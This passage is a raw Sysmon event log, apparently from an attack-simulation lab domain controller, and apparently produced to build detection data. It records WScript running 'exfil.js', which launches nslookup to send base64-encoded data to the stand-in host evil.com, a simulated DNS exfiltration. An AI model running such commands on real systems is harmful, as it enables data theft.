process>-udptruefalse127.0.0.1-52355-false127.0.0.1-53domain 354300x8000000000000000196660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.340{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52354- 354300x8000000000000000196659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.340{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52353- 354300x8000000000000000196658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.339{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52352- 354300x8000000000000000196657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.339{00000000-0000-0000-0000-000000000000}7948<unknown process>-udptruefalse127.0.0.1-52352-false127.0.0.1-53domain 354300x8000000000000000196656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.278{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52351- 354300x8000000000000000196655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.278{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52350- 10341000x8000000000000000196654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.161{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-17B1-629A-D53E-000000005F02}2568C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.145{2E1864BB-E13C-6299-0500-000000005F02}416536C:\Windows\system32\csrss.exe{2E1864BB-17B1-629A-D53E-000000005F02}2568C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.145{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.145{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.145{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-17B1-629A-D53E-000000005F02}2568C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.145{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.145{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.151{2E1864BB-17B1-629A-D53E-000000005F02}2568C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000196646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.105{2E1864BB-17B1-629A-D33E-000000005F02}26525228C:\Windows\system32\conhost.exe{2E1864BB-17B1-629A-D43E-000000005F02}3596C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.105{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.105{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.105{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.105{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.105{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B1-629A-D43E-000000005F02}3596C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.105{2E1864BB-17B1-629A-D23E-000000005F02}62206172C:\Windows\system32\cmd.exe{2E1864BB-17B1-629A-D43E-000000005F02}3596C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.109{2E1864BB-17B1-629A-D43E-000000005F02}3596C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B1-629A-D23E-000000005F02}6220C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxuuqt.tmp 2>&1 10341000x8000000000000000196638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.074{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B1-629A-D33E-000000005F02}2652C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.074{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B1-629A-D33E-000000005F02}2652C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.058{2E1864BB-17B1-629A-D33E-000000005F02}26525228C:\Windows\system32\conhost.exe{2E1864BB-17B1-629A-D23E-000000005F02}6220C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.043{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B1-629A-D33E-000000005F02}2652C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.043{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.043{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.027{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.027{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.027{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B1-629A-D23E-000000005F02}6220C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.027{2E1864BB-17A1-629A-783D-000000005F02}55524040C:\Windows\System32\WScript.exe{2E1864BB-17B1-629A-D23E-000000005F02}6220C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.041{2E1864BB-17B1-629A-D23E-000000005F02}6220C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxuuqt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.027{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlucf.tmpMD5=5DEA0472F77A6BF3961D4B745AA161B8,SHA256=60802D61581927EFE9566582D9B1AC54D5861CAF9DA1F25F5EA80365318A8915,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 